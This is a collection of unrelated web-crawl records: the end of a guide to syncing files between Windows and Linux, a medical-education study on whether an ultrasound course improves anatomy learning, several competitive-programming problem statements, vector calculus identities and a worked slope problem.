Another option is using a file synching program to copy your files from Windows to Linux. Usually, these programs manage the connection between two devices or systems via an encrypted key. There are two great apps you can use for this method:
- Resilio Sync – Although this app offers a paid version, the free option will do the job.
- SyncThing – This app offers the same services as the previous one but is 100% free.
Whether you choose the first or the second option, the way they work is the same. After you install your desired app on Windows and choose a syncing folder, you can create the necessary key. As you set it up on Linux, your data will begin to sync between the two systems.
In closing, maintaining an open mind is essential to learning how to copy files from a Windows PC to Linux. If you’re unfamiliar with one of the two operating systems, learning how to manage file transfer between the two will take some time.
One of the best ways to transfer your files is to try all the methods above to rule out the ones that don’t work for you and find the ones you love. Eventually, you can streamline the process using the most suitable option. | <urn:uuid:ca709812-9388-4f6c-b794-e70aeebe768d> | CC-MAIN-2023-14 | https://www.its2day.net/how-to-copy-files-from-a-windows-pc-to-linux/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945381.91/warc/CC-MAIN-20230326013652-20230326043652-00606.warc.gz | en | 0.864131 | 1,577 | 2.609375 | 3 |
- Research article
- Open Access
Does ultrasound education improve anatomy learning? Effects of the Parallel Ultrasound Hands-on (PUSH) undergraduate medicine course
BMC Medical Education volume 22, Article number: 207 (2022)
As ultrasound has become increasingly prominent in medicine, portable ultrasound is perceived as the visual stethoscope of the twenty-first century. Many studies have shown that exposing preclinical students to ultrasound training can increase their motivation and ultrasound competency. However, few studies have discussed the effect of ultrasound training on anatomy learning.
The Parallel Ultrasound Hands-on (PUSH) course was designed to investigate whether or not ultrasonography training affects anatomy knowledge acquisition. The PUSH course included anatomical structures located in the chest and abdomen (target anatomy) and was conducted in parallel to the compulsory gross anatomy course.
Learners (n = 140) voluntarily participated in this elective course (learners in the course before the midterm examination (Group 1, n = 69), or after the midterm examination (Group 2, n = 71)). Anatomy examination scores (written and laboratory tests) were utilized to compare the effects of the PUSH course.
Group 1 obtained significantly higher written test scores on the midterm examination (mean difference [MD] = 1.5(7.6%), P = 0.014, Cohen’s d = 0.43). There was no significant difference in the final examination scores between the two groups (Written Test: MD = 0.3(1.6%), P = 0.472). In Laboratory test, both mid-term (MD:0.7(2.8%), P = 0.308) and final examination (MD:0.3(1.5%), P = 0.592) showed no significant difference between two groups. Students provided positive feedback in overall learning self-efficacy after the PUSH course (Mean = 3.68, SD = ±0.56 on a 5-point Likert scale). Learning self-efficacy in the cognitive domain was significantly higher than that in the affective domain (MD = 0.58; P < 0.001) and psychomotor domain (MD = 0.12; P = 0.011).
The PUSH course featured a hands-on learning design that empowered medical students to improve their anatomy learning.
Ultrasound is an important and indispensable technology in medicine. Due to its nonradiative and noninvasive nature, ultrasound has long been used in specialties such as radiology, obstetrics/gynecology, and cardiology. There are increasingly more ultrasound applications in specialties such as emergency medicine and critical care medicine [1, 2]. Because ultrasound is vital to clinical practice, it should be taught and emphasized in medical education. Portable ultrasound came to be seen as the visual stethoscope and it started to be used as a tool in learning anatomy [4,5,6,7,8,9]. Many studies have shown that exposing undergraduate students to ultrasound can increase their interest, ultrasound skills and image recognition ability [4, 10]. It is reasonable that students improve their ultrasound knowledge after taking a course with an ultrasound curriculum. Several studies have also discussed the effect of ultrasound training on gross anatomy knowledge, but previous studies have shown mixed outcomes [4,5,6,7,8,9].
Some studies have investigated ultrasound and sonoanatomy education for medical students [4,5,6,7,8,9]. However, only two of these studies have suggested that ultrasound education not only improves medical students’ knowledge of ultrasound and skills but also enhances their anatomical knowledge [4, 8]. The similarities between these two studies are hands-on practice and integration with anatomy courses [4, 8]. The remaining studies showed no statistically significant improvement [5,6,7]. Interestingly, the studies with hand-on practice showed significant impact [4, 8], but those without ultrasound practice did not have significant results [5,6,7]. Only one study with hands-on practice showed no significant result, but the ultrasound was taught by undergraduate students . The importance of hands-on practice in ultrasound imaging has been emphasized by other authors as well . These results suggest that learning by doing could be an effective approach to learn anatomy , and might be due to concrete experience during practice .
However, written assessments in the studies included both ultrasound and gross anatomy images; thus the studies did not analyze the effect of ultrasound on gross anatomy learning individually [4,5,6,7]. It is difficult to identify whether the educational gains originated from the improvement of knowledge in ultrasound, gross anatomy, or both. Based on the “learning by doing” theory and the experiential learning theory , a Parallel Ultrasound Hands-on (PUSH) course was designed for sonoanatomy. The impact of this course on anatomy learning in both written tests and practical assessments on cadavers was investigated. The hypotheses of our study are the following:
Hypothesis 1: PUSH training enhances theoretical knowledge of anatomy, evidenced by improved performance in written assessments.
Hypothesis 2: PUSH training enhances applied knowledge of anatomy, evidenced by improved performance in cadaver laboratory tests.
This crossover study enrolled undergraduate third-year medical students who started to take the anatomy curriculum (the doctor of medicine curriculum in Taiwan includes 4 years of preclinical education and 2 years of clinical training in the hospital). Participating students came from a single institution (Taipei Medical University), located in Taiwan. Participants who had any experiences of ultrasound lectures or hands-on workshops were excluded. This study analyzed the impact of incorporating theoretical and practical ultrasonography training in the preclinical human anatomy curriculum.
The Parallel Ultrasound Hands-on (PUSH) course was designed to be complementary to the regular anatomy training that was held throughout a 6-month period. The curricula of these courses (PUSH and traditional anatomy) were developed in parallel, but without direct integration between them (Supplementary Material 1). The PUSH course included seven 40-min lectures (see figure for the course design) held approximately in advance of the formal anatomy class, as well as two hands-on practical workshops. The lecture contents focused on selected structures in the chest and abdomen, which included the heart, hepatobiliary system, urinary system, and great vessels. Only basic ultrasound introduction, ultrasound image and practice techniques were taught in the lecture. In addition, the course included two 120-min workshops (the tutor/learner ratio was 1:4, and all tutors (residents) received the ultrasound faculty training for 6 months in the clinical skill center of WanFang hospital and got the certification) which focused on checklist-guided hands-on practice (Supplementary Material 2), which covered anatomical structures included in the lectures. Each workshop(120 min) focused on two different systems(60 min each). During the workshops, tutors demonstrated first and then students performed hands-on ultrasonographic identification of target anatomical structures on each other. Learners were given enough time to practice ultrasound skills and knowledge acquired during the lectures. Target anatomical structures include cardiovascular, hepatobiliary and urinary systems. Every student had 15mins for hands-on practice and 45mins for observation and discussion with the tutor and scanner in each system. Clear learning goals and tasks were made explicit through an ultrasound checklist provided at the beginning of the course. Students also received real-time feedback from the tutors to ensure that they appropriately identified checklist items.
Of 164 eligible medical students, 140 (85%) voluntarily participated in this elective course, with no dropout. The percentage of participation was about 91.2%. Students were assigned into two groups based on their schedule availability. One group participated in the PUSH course during the first half of the semester, and the other group participated in the latter half of the semester (Fig. 1). The midterm and final examination scores of the traditional anatomy course were used to measure the educational impact of the PUSH course. The mean scores differences between the two groups in the midterm and final examinations were analyzed. Although the examinations’ blueprints covered the entire human anatomy curriculum, the analysis included only assessment items of anatomical structures included in the PUSH course. The anatomy examination format included written items and laboratory test items on cadavers. The analysis included 50 single-answer multiple choice items from the written test and 50 items on the laboratory test; these items were not specifically associated with ultrasonographic knowledge, performance skills, or images.
In addition to the midterm and final examination scores, the PUSH course included the completion of a learning self-efficacy scale which is designed to measure learners’ confidence in their capability to learn specific subjects (Supplementary Material 3). The item order and descriptions were similar to those of the original published version but were translated to Traditional Mandarin Chinese . The scale consisted of 12 items and covered the cognitive, affective, and psychomotor domains of sonoanatomy training. There were four items in each domain rated with a five-point Likert scale (from 1 to 5; strongly disagree to strongly agree and the neutral value is 3).
An independent t-test was conducted to test for differences in baseline characteristics, written test scores for target anatomy, laboratory examination scores for target anatomy, and learning self-efficacy between the two groups. A dependent sample t-test was employed to test improvement in target anatomy in the written and laboratory tests and stratified the sample by the group. Because t-tests were used in the present study, t-values were also presented based on the t distribution of the obtaining values between groups or paired data. As an absolute t value of a test achieves 1.96, the finding would be statistically significant. Post hoc effect size was calculated based on the formula as follow:
Here χ1 refers to mean of correct items in the group 1 and χ2 refers mean of correct items in the group 2. Besides, \(\int1\) indicates standard deviation of correct items in the group 1, and \(\int2\) indicates standard deviation of correct items in the group 2.
Because learning self-efficacy was measured in a one-shot survey after the PUSH course, the difference in learning self-efficacy between the two groups was not part of the aims of this study. The scale was used to explore students’ efficacy in learning, the data was analyzed using a critical value test with a neutral score value of 3. If the test value was significantly higher than 3, medical students had positive efficacy in learning sonoanatomy. The analysis included the differences among the three domains of learning self-efficacy after the PUSH course. A general linear model was utilized to compare differences among the domains. If a P-value lower than 0.05 was achieved, the outcome reached statistical significance.
The two groups had similar characteristics, including male and female percentage (chi-square = 0.36; P = 0.866) and scores on other anatomy items on the written examination (MD = 1.0; 3.5%; P = 0.233) and laboratory examination (MD = 0.6; 2.4%; P = 0.515). The only statistically significant difference in test scores between the groups was observed in the midterm written examination. In the first study period, group 1 had a higher written test score for target anatomy (mean correct items = 12.7, 63.5%) than group 2 (mean correct items = 11.2, 55.8%) after the ultrasound course (MD = 1.5(7.6%); P = 0.014), but there was no difference in the laboratory examination score for target anatomy between the two groups (mean correct items in group 1 = 11.6, 44.6%; mean correct items in group 2 = 10.9, 41.8%; MD = 0.7(2.8%); P = 0.308) (Table 1). In the second study period, group 2 received an ultrasound course and had no significant difference in target anatomy in either the written examination (mean correct items in group 1 = 12.8, 60.9%; mean correct items in group 2 = 12.5, 62.4%; MD = 0.3(1.6%); P = 0.472) or the laboratory examination (mean correct items in group 1 = 10.1, 47.9%; mean correct items in group 2 = 9.8, 46.4%; MD = 0.3(1.5%); P = 0.592) compared to group 1 (Table 2).
Furthermore, there was no significant difference in learning self-efficacy of sonoanatomy between the two groups after the PUSH course (Table 3). Overall Cronbach’s alpha was: 0.899 (sub-scales of cognitive domain:0.890, affective domain:0.803, and psychomotor domain: 0.839). Participants provided positive feedback in overall learning self-efficacy after the PUSH course (Mean = 3.68, SD = ±0.56; P < 0.001). Similar results were observed in all three subdomains of learning self-efficacy. The students reported positive learning self-efficacy in the cognitive domain (Mean = 3.91, SD = ±0.67; P < 0.001), affective domain (Mean = 3.33, SD = ±0.66; P < 0.001), and psychomotor domain (Mean = 3.79, SD = ±0.69; P < 0.001). Differences in learning self-efficacy among the subdomains were observed. Learning self-efficacy in the cognitive domain was significantly higher than that in the affective domain (MD = 0.58; P < 0.001) and psychomotor domain (MD = 0.12; P = 0.011). Learning self-efficacy in the affective domain was significantly lower than that in the psychomotor domain (MD = − 0.46; P < 0.001) (Table 4).
The gap between ultrasound images and the gross anatomy
The results of this study determined that the group receiving PUSH course intervention increased scores on the written test in the midterm examination but led to no significant improvement in the laboratory examination in gross anatomy. This result may be due to the vast difference between ultrasound images and the actual appearance of gross anatomy in the cadaver. Generally, ultrasound helps students learn the location and relationships between anatomical structures and their disposition in a living human body, strengthening their cognition and concepts of anatomy . Additionally, medical students can observe dynamic changes in the heart and the blood flow of vessels through ultrasound. Ultrasonography allows medical students to learn anatomy from a different point-of-view. However, these advantages might not be applicable to the recognition of organs or structures of cadaveric origin. There is a large gap between monochromatic images and the appearance of cadaveric organs or structures. The results from the previous studies suggest that ultrasonographic training can aid learners’ understanding of anatomical concepts (such as the three-dimensional orientation and spatial correlation of anatomical structures within the body), which may complement and enhance the traditional anatomical curriculum [16, 17].
Several institutions integrate ultrasound training in general medical education, including anatomy and physical examination . Many studies have revealed positive findings for student satisfaction, but the learning outcomes of anatomy via ultrasound curricula are controversial [4, 5, 9, 19, 20]. Many of these studies lacked control or pre-intervention groups in learning outcome evaluation. There is still insufficient evidence to suggest that ultrasound training leads to significant improvement in anatomical knowledge or physical examination skills of undergraduate medical students . This study attempted to overcome these gaps by utilizing a crossover study design and created an additional ultrasound course that was independent of the current anatomy curriculum. We found that by participating in an elective ultrasound course, undergraduate medical students were able to improve their midterm but not final anatomy written examination scores.
The reasons for the effect of PUSH on anatomy learning
There may be several reasons for the findings of this study. First, the results of learning self-efficacy at the end of the semester showed the cognitive domain is significantly higher than that in the psychomotor domain. The early exposure of medical students to clinical tools can increase their learning motivation and interest because it enables them to understand how to apply their anatomy knowledge to clinical practice by learning ultrasound [21, 22], and this creates awareness of the importance of anatomy in the preclinical training years. Bridging anatomy knowledge and clinical practice is important and can enable medical students to understand the need for a functional understanding of anatomy [5, 21]. Ultrasonographic training also provides a clinical context to justify the need for anatomical knowledge, making anatomy more concrete and practical .
Second, the use of ultrasound to support anatomy instruction allows students to observe the dynamic changes in organs, such as the opening and closing of heart valves, the direction of blood flow and the importance of heart physiology features, such as ejection fraction and cardiac output. This allows learners to gain more insight of the application of anatomy to the understanding of clinical medicine. Third, medical students learn to operate ultrasound probes to identify relevant anatomical structures through hands-on ultrasonographic training. This process enables learners to develop a three-dimensional understanding of the disposition of specific structures in the body and their spatial relationships.
Ultrasound training improves anatomy learning
Previous studies showed varied outcomes in exploring the efficacy of learning gross anatomy via ultrasound [4,5,6,7,8,9]. It is difficult to reach specific conclusions because of significant differences in curricular design. By reviewing previously published studies, a new curriculum was designed and implemented, yielding positive educational outcomes. The main features of this curriculum were a hands-on practical approach in a small group setting, and included a crossover study design to compare the educational outcome. Most studies did not include a hands-on component in their ultrasound course design [5,6,7] and none of them provided students with the opportunity to develop ultrasound skills by concrete experience. Conducting ultrasonographic examinations on real humans strongly strengthens the three-dimensional perception of human anatomy . To minimize any negative effects of elective ultrasonography training on the original compulsory gross human anatomy course, the PUSH course was conducted in a manner that did not affect the time allotted to the study of gross anatomy. Many studies assessed ultrasound ability and knowledge in tests and did not report these results separately [4,5,6,7]. Consequently, it is unclear whether their observations were due to improvements in anatomy knowledge or ultrasound knowledge. It may be taken for granted that the scores of ultrasound knowledge would improve after learning ultrasound compared to the scores of learners who did not have this opportunity. Hence, to focus on the effect of learning anatomy itself, this study did not include any specific ultrasound imaging or knowledge evaluation. Only anatomy written tests and cadaver laboratory tests were conducted. Holding a parallel curriculum could improve students’ acquisition of anatomical knowledge with the aid of ultrasound training.
Characteristics of the PUSH course
These findings may be related to several specific characteristics of the PUSH course. The course methodology had four particular features. First, learners participated voluntarily in the course because they could gain early exposure to clinical medicine that would be valuable for their future and increased their motivation. Second, during the hands-on workshops, learners were given enough time to practice ultrasound skills and knowledge acquired during the lectures. This meant that these students could adopt learning strategies depending on their educational needs and preferences . Third, clear learning goals and tasks were made explicit through an ultrasound checklist provided at the beginning of the course, which allowed learners to prepare before the workshops. Fourth, on-site tutors corrected students’ manipulation of ultrasound probes and ensured that they appropriately identified checklist items through synchronous observation and feedback.
These features are different from those of previous studies on ultrasound integrated with anatomy [3,4,5,6,7, 9]. Therefore, these findings suggest that in the future, integrating ultrasound and anatomy courses requires careful consideration of the course design, including self-directed learning, as well as checklist-oriented and hands-on workshops with on-site tutors . Traditionally, ultrasound learning was provided exclusively during the clinical formative years, but the results of this study suggest that ultrasonographic training is a feasible form of early clinical exposure that can not only motivate learners but help them bridge the gap between preclinical training to the practice of medicine.
Limitations of the study
This study had some limitations. First, the blueprint of the cadaveric laboratory assessment was not specifically aligned with the ultrasound curriculum, therefore, the cadaveric laboratory test improvement observed in this study may not be directly related to the ultrasonographic training. Second, students received ultrasound checklists at the beginning of the course and tutors were available for immediate feedback during hands-on practice, but we did not evaluate students’ ultrasound learning outcomes systematically. Third, it is hard to ascertain how the additional lectures that students received as part of the PUSH may have influenced the test results as they presumably contained reviews of the anatomy, thus confounding the true impact of the ultrasound intervention. Fourth, 140 of 164 learners who joined the study were all volunteers, which may contribute to self-selection bias. Because students who come to participate voluntarily may be more motivated, and the results of this study cannot be applied to the entire student population. These suggest that future studies should attempt to avoid these limitations.
Overall, the PUSH course with its active learning played a supportive role in learning anatomy and responded to the trends in clinical practice, in which ultrasound is becoming a common tool of the modern clinician. The findings of this study suggest that the implementation of a sonoanatomy course enhanced their learning in the field of anatomy.
Availability of data and materials
The datasets used and/or analyzed during the current study are available from the corresponding author on reasonable request.
Parallel UltraSound Hands-on
Maitino AJ, Levin DC, Rao VM, Parker L, Sunshine JH. Do emergency medicine physicians perform ultrasound and conventional radiography in the emergency department? Recent trends from 1993 to 2001. J Am Coll Radiol 2005;2:274–278.
POLICY STATEMENT Ultrasound Guidelines: Emergency, Point-of-care, and Clinical Ultrasound Guidelines in Medicine. 2016.
Gillman LM, Kirkpatrick AW. Portable bedside ultrasound: the visual stethoscope of the 21st century. Scand J Trauma Resusc Emerg Med. 2012;20:18. https://doi.org/10.1186/1757-7241-20-18.
Dreher SM, Dephilip R, Bahner D. Ultrasound exposure during gross anatomy. J Emerg Med. 2014;46:231–40.
Finn GM, Sawdon M, Griksaitis M. The additive effect of teaching undergraduate cardiac anatomy using cadavers and ultrasound echocardiography. Eur J Anat. 2012;16:199–205.
Griksaitis MJ, Sawdon MA, Finn GM. Ultrasound and cadaveric prosections as methods for teaching cardiac anatomy: a comparative study. Anat. Sci Educ. 2012;5:20–6.
Canty DJ, Hayes JA, Story DA, Royse CF. Ultrasound simulator-assisted teaching of cardiac anatomy to preclinical anatomy students: a pilot randomized trial of a three-hour learning exposure. Anat Sci Educ. 2015;8:21–30.
Kondrashov P, Johnson JC, Boehm K, Rice D, Kondrashova T. Impact of the clinical ultrasound elective course on retention of anatomical knowledge by second-year medical students in preparation for board exams. Clin Anat. 2015;28:156–63.
Knobe M, Carow JB, Ruesseler M, Leu BM, Simon M, Beckers SK, et al. Arthroscopy or ultrasound in undergraduate anatomy education: a randomized cross-over controlled trial. BMC Med Educ 2012;12:85.
Ivanusic J, Cowie B, Barrington M. Undergraduate student perceptions of the use of ultrasonography in the study of “Living Anatomy” Anat Sci Educ 2010;3:318–322.
Knudsen L, Nawrotzki R, Schmiedl A, Mühlfeld C, Kruschinski C, Ochs M. Hands-on or no hands-on training in ultrasound imaging: a randomized trial to evaluate learning outcomes and speed of recall of topographic anatomy. Anat Sci Educ. 2018;11:575–91. https://doi.org/10.1002/ASE.1792.
Dewey J. Experience and Thinking. In: Democracy and Education. 1916. p. 735. https://doi.org/10.2307/2178611.
Yardley S, Teunissen PW, Dornan T. Experiential learning: transforming theory into practice. Med Teach. 2012;34:161–4.
Kang Y-N, Chang C-H, Kao C-C, Chen C-Y, Wu C-C. Development of a short and universal learning self-efficacy scale for clinical skills. PLoS One 2019;14:e0209155. https://doi.org/10.1371/journal.pone.0209155.
Alexander SM, Pogson KB, Friedman VE, Corley JL, Hipolito Canario DA, Johnson CS. Ultrasound as a learning tool in bachelor-level anatomy education. Med. Sci Educ. 2021;31:193–6. https://doi.org/10.1007/S40670-020-01170-1/FIGURES/2.
Gunderman RB, Wilson PK. Viewpoint: exploring the human interior: the roles of cadaver dissection and radiologic imaging in teaching anatomy. Acad Med. 2005;80:745–9. https://doi.org/10.1097/00001888-200508000-00008.
Sugand K, Abrahams P, Khurana A. The anatomy of anatomy: a review for its modernization. Anat Sci Educ 2010;3:NA-NA. https://doi.org/10.1002/ase.139.
Davis JJ, Wessner CE, Potts J, Au AK, Pohl CA, Fields JM. Ultrasonography in undergraduate medical education: a systematic review. J Ultrasound Med. 2018;37:2667–79. https://doi.org/10.1002/jum.14628.
Gradl-Dietsch G, Korden T, Modabber A, Sönmez TT, Stromps J-P, Ganse B, et al. Multidimensional approach to teaching anatomy—do gender and learning style matter? Ann Anatomy-Anatomischer Anzeiger. 2016;208:158–64.
Jamniczky HA, Cotton D, Paget M, Ramji Q, Lenz R, McLaughlin K, et al. Cognitive load imposed by ultrasound-facilitated teaching does not adversely affect gross anatomy learning outcomes. Anat. Sci Educ. 2017;10:144–51. https://doi.org/10.1002/ase.1642.
Prince KJAH, van de Wiel M, Scherpbier AJJA, Cess PM, Boshuizen HPA. A qualitative analysis of the transition from theory to practice in undergraduate training in a PBL-medical school. Adv heal. Sci Educ. 2000;5:105–16.
Başak O, Yaphe J, Spiegel W, Wilm S, Carelli F, Metsemakers JFM. Early clinical exposure in medical curricula across Europe: an overview. Eur J Gen Pract. 2009;15:4–10.
Skalski JH, Elrashidi M, Reed DA, Mcdonald FS, Bhagra A. Using standardized patients to teach point-of-care ultrasound-guided physical examination skills to internal medicine residents. J Grad Med Educ. 2015;7:95–7. https://doi.org/10.4300/JGME-D-14-00178.1.
Ericsson KA, Krampe RT, Tesch-Romer C. The role of deliberate practice in the acquisition of expert performance. Psychol Rev. 1993;100:363–406.
Hill M, Peters M, Salvaggio M, Vinnedge J, Darden A. Implementation and evaluation of a self-directed learning activity for first-year medical students Med Educ Online 2020;25:1717780. https://doi.org/10.1080/10872981.2020.1717780.
The authors thank our colleagues Hao-Yu Chen and Hung-Chen Chen in the Center for Education in Medical Simulation (CEMS) Taipei Medical University, who provided insight and expertise that greatly assisted the research. In addition, all authors appreciate the anatomical education and the curricular structure from professor Tsorng-Harn Fong in Department of Anatomy and Cell Biology, School of Medicine, College of Medicine, Taipei Medical University. This research was supported by Municipal Wan-Fang Hospital, Taipei Medical University.
The present study is funded by Taipei Medical University, Wan Fang Hospital Research Grant 107-wf-swf-06 and 108-wf-swf-07. The funders had no role in the design of this study and did not have any role during its execution, analyses, interpretation of the data, or decision to submit results.
Ethical approval and consent to participate
The study was approved by Taipei Medical University Joint Institutional Review Board (TMU-JIRB) for Human Experimentation. The number of IRB was TMU-JIRB N201909012.
Since data was collected through a post-course survey, the TMU-JIRB suggested that verbal informed consent was sufficient. Informed consent: Informed consent was obtained from all individual participants included in the study.
Consent for publication
The authors declare no competing financial interest.
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Additional file 1.
Additional file 2.
Additional file 3.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/. The Creative Commons Public Domain Dedication waiver (http://creativecommons.org/publicdomain/zero/1.0/) applies to the data made available in this article, unless otherwise stated in a credit line to the data.
About this article
Cite this article
Chen, WT., Kang, YN., Wang, TC. et al. Does ultrasound education improve anatomy learning? Effects of the Parallel Ultrasound Hands-on (PUSH) undergraduate medicine course. BMC Med Educ 22, 207 (2022). https://doi.org/10.1186/s12909-022-03255-4
- Gross anatomy education
- Medical education
- Undergraduate education ultrasound education
- Parallel ultrasound course | <urn:uuid:7edbec67-1c51-443b-a3d4-4dc2a34c93ab> | CC-MAIN-2023-14 | https://bmcmededuc.biomedcentral.com/articles/10.1186/s12909-022-03255-4 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949644.27/warc/CC-MAIN-20230331144941-20230331174941-00006.warc.gz | en | 0.931846 | 6,901 | 2.5625 | 3 |
Sort of Sorting
Can you believe school has already started? It seems like we were just finishing last semester. Last semester was tough because the administration had a hard time keeping records of all the students in order, which slowed everything down. This year, they are going to be on top of things. They have recognized that you have the skills to help them get into shape with your programming ability, and you have volunteered to help. You recognize that the key to getting to student records quickly is having them in a sorted order. However, they don’t really have to be perfectly sorted, just so long as they are sort-of sorted.
Write a program that sorts a list of student last names, but the sort only uses the first two letters of the name. Nothing else in the name is used for sorting. However, if two names have the same first two letters, they should stay in the same order as in the input (this is known as a ‘stable sort’). Sorting is case sensitive based on ASCII order (with uppercase letters sorting before lowercase letters, i.e., $A < B < \ldots < Z < a < b < \ldots < z$).
Input consists of a sequence of up to $500$ test cases. Each case starts with a line containing an integer $1 \leq n \leq 200$. After this follow $n$ last names made up of only letters (a–z, lowercase or uppercase), one name per line. Names have between $2$ and $20$ letters. Input ends when $n = 0$.
For each case, print the last names in sort-of-sorted order, one per line. Print a blank line between cases.
|Sample Input 1||Sample Output 1|
3 Mozart Beethoven Bach 5 Hilbert Godel Poincare Ramanujan Pochhammmer 0
Bach Beethoven Mozart Godel Hilbert Poincare Pochhammmer Ramanujan | <urn:uuid:a30c94c9-b321-46c7-860a-c22921847e0b> | CC-MAIN-2023-14 | https://nus.kattis.com/courses/CS2040/CS2040_S2_AY2223/assignments/e4ob7y/problems/sortofsorting | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943483.86/warc/CC-MAIN-20230320114206-20230320144206-00207.warc.gz | en | 0.940788 | 435 | 3.09375 | 3 |
You stay in a cottage at a clearing in a forest. The forest consists of $V$ clearings and $E$ trails. Clearings are open spots where fruits may be found, and are numbered from $1$ to $V$. Your cottage is at clearing $1$. Trails connects two clearings. You ensure self sustainability by gathering fruits in the forest for food.
Through extensive reconnaissance, you learn that there are $C$ clearings containing exactly one batch of growing fruits. You also learn that fruits in this forest, once picked, will take $K$ days to grow before it is ready to be picked again. (A fruit picked on day $X$ is ready to be picked again on day $X + K$)
It is currently day $1$. Coincidentally, all $C$ clearings have one batch of fruits ready to be picked. From now until day $M$ inclusive, what is the minimum distance you have to walk per day in order to be able to gather at least one batch of fruits and return to your cottage every day?
The first line of the input contains $5$ integers $V$ ($1 \leq V \leq 20\, 000$) $E$ ($1 \leq E \leq 100\, 000$) $C$ ($1 \leq C \leq V$) $K$ ($1 \leq K \leq 2\, 000\, 000\, 000$) and $M$ ($1 \leq M \leq 2\, 000\, 000\, 000$).
The following $E$ lines contains $3$ space-separated integers each, $u_ i\: v_ i\: w_ i$ ($1 \leq u_ i, v_ i \leq V$, $1 \leq w_ i \leq 1\, 000\, 000$) describing a trail that directly connects clearing $u$ to clearing $v$ directly with a length of $w$ unit distance. There are at most one trail directly connecting any two clearings, and no trail connects a clearing to itself. There could be clearings that cannot be reached from the cottage.
The last line of the input contains $C$ distinct space separated integers $f_1$ to $f_ C$ ($1 \leq f \leq V$), the clearings where fruits grow.
Output a single value—the required answer. If it is impossible to gather at least one batch of fruits every day from day $1$ until day $M$, output $-1$ instead.
(25 Points): $C = 1, K = 1$
(25 Points): $C = M, K = M$
(30 Points): $1 \leq M \leq 100\, 000$
(20 Points): No additional constraint.
Sample Input Explanation
For sample $1$, there are $2$ clearings with fruits, one located at clearing $2$ ($1$ unit distance away from the cottage) and one located at clearing $3$ ($2$ unit distance away from the cottage). Suppose you pick the fruit at clearing $2$ on day $1$. The total distance traveled on this day is $2$ units- the distance from your cottage to clearing $2$ and back. On day $2$, the fruit at clearing $2$ has not grown back yet (it will be available for picking on day $3$), and you will have to walk to clearing $3$ for fruits. The furthest distance you have walked in a single day so far is $4$ units- the distance from the cottage to clearing $3$ and back. The answer is the same if you had instead picked the fruits at clearing $3$ first and then clearing $2$.
For sample $2$, the fruits at both clearings do not grow back in time.
|Sample Input 1||Sample Output 1|
3 2 2 2 3 1 2 1 2 3 1 2 3
|Sample Input 2||Sample Output 2|
3 2 2 3 3 1 2 1 2 3 1 2 3 | <urn:uuid:4541114f-14ce-46c9-a642-13d7e8c73ff4> | CC-MAIN-2023-14 | https://nus.kattis.com/courses/IT5003/IT5003_S2_AY2122/assignments/dd9c4g/problems/forestfruits | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945287.43/warc/CC-MAIN-20230324144746-20230324174746-00407.warc.gz | en | 0.886456 | 913 | 2.546875 | 3 |
Boating season is over for this year, and Theseus has parked his boat on land. Of course, the boat looks nothing like it did as of the beginning of the season; it never does. You see, Theseus is constantly looking for ways to improve his boat.
At every day of the boating season, Theseus bought exactly one type of item at his local supply store, and replaced the existing part on his boat with it. Now, as the season has ended, Theseus wonders what day he replaced all the parts from the previous season.
The first line of the input consists of two space-separated
integers $P$ and
$N$, representing the
number of parts the boat consists of, and the number of days in
the boating season respectively.
Then follows $N$ lines, each line has a single word $w_ i$, the type of boat part that Theseus bought on day $i$.
Output the day Theseus ended up replacing the last existing part from the previous season, or paradox avoided if Theseus never ended up replacing all the different parts.
$1 \leq P \leq N \leq 1\, 000$.
Each word $w_ i$ will consist only of the letters a–z and _ (underscore).
Each word $w_ i$ will be between $1$ and $20$ characters long.
The number of distinct $w_ i$s will be at most $P$.
|Sample Input 1||Sample Output 1|
3 5 left_oar right_oar left_oar hull right_oar
|Sample Input 2||Sample Output 2|
4 5 motor hull left_oar hull motor | <urn:uuid:93800bf7-9591-4e73-8b2b-f67cb67d4cdb> | CC-MAIN-2023-14 | https://baylor.kattis.com/courses/CSI4144/22s/assignments/b8ad2f/problems/boatparts | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949093.14/warc/CC-MAIN-20230330004340-20230330034340-00607.warc.gz | en | 0.931298 | 406 | 2.84375 | 3 |
Curl of the gradient:
The curl of the gradient of any scalar field φ is always the zero vector field
$$ \nabla \times (\nabla \varphi)=0 $$
Divergence of the curl:
The divergence of the curl of any vector field F is always zero.
$$ \nabla \cdot(\nabla \times F)=0 $$
Divergence of the gradient:
The Laplacian of a scalar field is the divergence of its gradient
$$ \nabla^2 f = \nabla \cdot \nabla f $$
the result is a scalar quantity.
Curl of the curl:
$$ \nabla \times (\nabla \times A) = \nabla (\nabla \cdot A) -\nabla^2A $$
Here, ∇2 the vector Laplacian operating on the vector field A | <urn:uuid:8154a19f-ec04-46fd-981c-d53629190d85> | CC-MAIN-2023-14 | https://algebra-calculators.com/second-derivatives-vector-calculus-formulas/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945315.31/warc/CC-MAIN-20230325033306-20230325063306-00207.warc.gz | en | 0.748275 | 212 | 3.046875 | 3 |
Find the slope of the line, which makes an angle of $30^\circ $ with the positive direction of y-axis measured anticlockwise.
Hint: Need to visualize the given information on coordinate axes. Slope of a line is measured with the help of the angle measured from the line with respect to the positive x-axis.
Complete step-by-step answer:
Given that a line makes an angle of $30^\circ $ with the positive y-axis measured anti clockwise.
That means the corresponding figure will be like,
We need to find the $\theta $, which is measured from the line with respect to positive x-axis.
Then $\theta = 30^\circ + 90^\circ = 120^\circ $
Thus, slope of the given line is $\tan \theta = \tan 120^\circ $
$ \Rightarrow \tan 180^\circ = \tan (180^\circ - 60^\circ ) = - \tan 60^\circ = - \sqrt 3 $
$\therefore $ The slope of the given line is $ - \sqrt 3 $.
